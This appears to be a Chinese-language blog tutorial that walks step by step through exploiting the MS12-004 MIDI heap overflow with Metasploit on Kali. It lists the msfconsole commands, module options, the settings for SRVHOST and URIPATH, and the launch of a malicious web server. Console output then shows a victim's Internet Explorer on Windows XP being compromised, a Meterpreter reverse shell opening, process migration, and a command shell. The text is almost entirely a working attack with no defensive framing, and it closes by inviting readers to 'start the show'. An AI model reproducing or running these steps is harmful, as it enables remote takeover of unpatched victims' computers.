关于MS12_004漏洞的利用
1.打开msf控制台
root@kali:~# msfconsole
ps:可能会用到这个 /etc/init.d/postgresql start(管理员权限)
2.查找漏洞利用模板
msf > search 12_004 Matching Modules ================ Name Disclosure Date Rank Description ---- --------------- ---- ----------- exploit/windows/browser/ms12_004_midi 2012-01-10 normal MS12-004 midiOutPlayNextPolyEvent Heap Overflow
3.利用漏洞
msf > use exploit/windows/browser/ms12_004_midi
msf变成了这样__msf exploit(ms12_004_midi) >
4.查看配置信息
msf exploit(ms12_004_midi) > show options Module options (exploit/windows/browser/ms12_004_midi): Name Current Setting Required Description ---- --------------- -------- ----------- OBFUSCATE false no Enable JavaScript obfuscation SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLCert no Path to a custom SSL certificate (default is randomly generated) URIPATH no The URI to use for this exploit (default is random)
Exploit target:
Id Name
-- ----
0 Automatic
5.设置SRVHOST(本机IP地址)
msf exploit(ms12_004_midi) > set SRVHOST 192.168.43.80 SRVHOST => 192.168.43.80
6.设置URIPATH(访问网页的名字,任意)
msf exploit(ms12_004_midi) > set URIPATH 1 URIPATH => 1
7.开始渗透
msf exploit(ms12_004_midi) > exploit [*] Exploit running as background job. [*] Started reverse TCP handler on 192.168.43.80:4444 msf exploit(ms12_004_midi) > [*] Using URL: http://192.168.43.80:8080/1 [*] Server started.
8.使被攻击者访问此URL : http://192.168.43.80:8080/1
以下为被攻击者访问URL之后的情况
[*] 192.168.43.35 ms12_004_midi - Request as: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
[*] 192.168.43.35 ms12_004_midi - Sending html to 192.168.43.35:1090...
[*] 192.168.43.35 ms12_004_midi - Request as: Windows-Media-Player/9.00.00.3250
[*] 192.168.43.35 ms12_004_midi - Sending midi corruption file...
[*] 192.168.43.35 ms12_004_midi - Request as: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
[*] 192.168.43.35 ms12_004_midi - Sending html to 192.168.43.35:1094...
[*] 192.168.43.35 ms12_004_midi - Request as: Windows-Media-Player/9.00.00.3250
[*] 192.168.43.35 ms12_004_midi - Sending midi corruption file...
[*] 192.168.43.35 ms12_004_midi - Request as: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
[*] 192.168.43.35 ms12_004_midi - Sending midi corruption file...
[*] Sending stage (957487 bytes) to 192.168.43.35
msf exploit(ms12_004_midi) > [*] Meterpreter session 1 opened (192.168.43.80:4444 -> 192.168.43.35:1096) at 2017-07-16 02:11:59 -0400
[*] Session ID 1 (192.168.43.80:4444 -> 192.168.43.35:1096) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3612)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3324
[+] Successfully migrated to process
9.设置获取的session ID
msf exploit(ms12_004_midi) > sessions -i 1 [*] Starting interaction with 1...
10.得到权限之后输入变成了___meterpreter >
meterpreter > shell Process 1552 created. Channel 1 created. Microsoft Windows XP [�汾 5.1.2600] (C) ��Ȩ���� 1985-2001 Microsoft Corp. C:\Documents and Settings\Administrator\����>
接下来就开始你的表演吧!
具体可以做哪些事情百度一下就全知道了